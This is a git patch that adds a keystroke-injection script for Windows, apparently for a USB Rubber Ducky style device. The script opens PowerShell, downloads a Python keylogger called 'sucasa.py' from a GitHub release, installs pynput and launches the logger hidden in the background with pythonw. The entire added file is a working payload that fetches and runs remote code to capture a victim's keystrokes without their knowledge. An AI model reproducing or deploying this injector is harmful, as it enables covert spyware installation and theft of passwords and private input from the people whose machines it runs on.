From feb04950112e02eb591560164c8310aba718fbdc Mon Sep 17 00:00:00 2001
From: Jessi McKissick <dwm0816@outlook.com>
Date: Sat, 21 Oct 2023 15:08:43 -0700
Subject: [PATCH] Added injector file for windows

Uses powershell and pythonw to background the process.
---
 sucasa_inject-direct_windows.txt | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 sucasa_inject-direct_windows.txt

diff --git a/sucasa_inject-direct_windows.txt b/sucasa_inject-direct_windows.txt
new file mode 100644
index 0000000..db365d1
--- /dev/null
+++ b/sucasa_inject-direct_windows.txt
@@ -0,0 +1,29 @@
+REM Author: JAM
+REM Description: Downloads and enables the sucasa keylogger on windows
+REM Version: 1.0
+REM Category: Execution
+GUI r
+DELAY 2000
+STRING powershell
+ENTER
+DELAY 4000
+STRING $source = "https://github.com/JessiMcKissick/sucasa-keylogger/releases/download/betas/sucasa.py"
+ENTER
+DELAY 1000
+STRING $destination = "$env:USERPROFILE\sucasa.py"
+ENTER
+DELAY 1000
+STRING $client = new-object System.Net.WebClient
+ENTER
+DELAY 1000
+STRING $client.DownloadFile($source,$destination)
+ENTER
+DELAY 1000
+STRING pip install pynput
+ENTER
+DELAY 3000
+STRING Start-Process -NoNewWindow pythonw $env:USERPROFILE\sucasa.py
+ENTER
+DELAY 1000
+STRING exit
+ENTER
\ No newline at end of file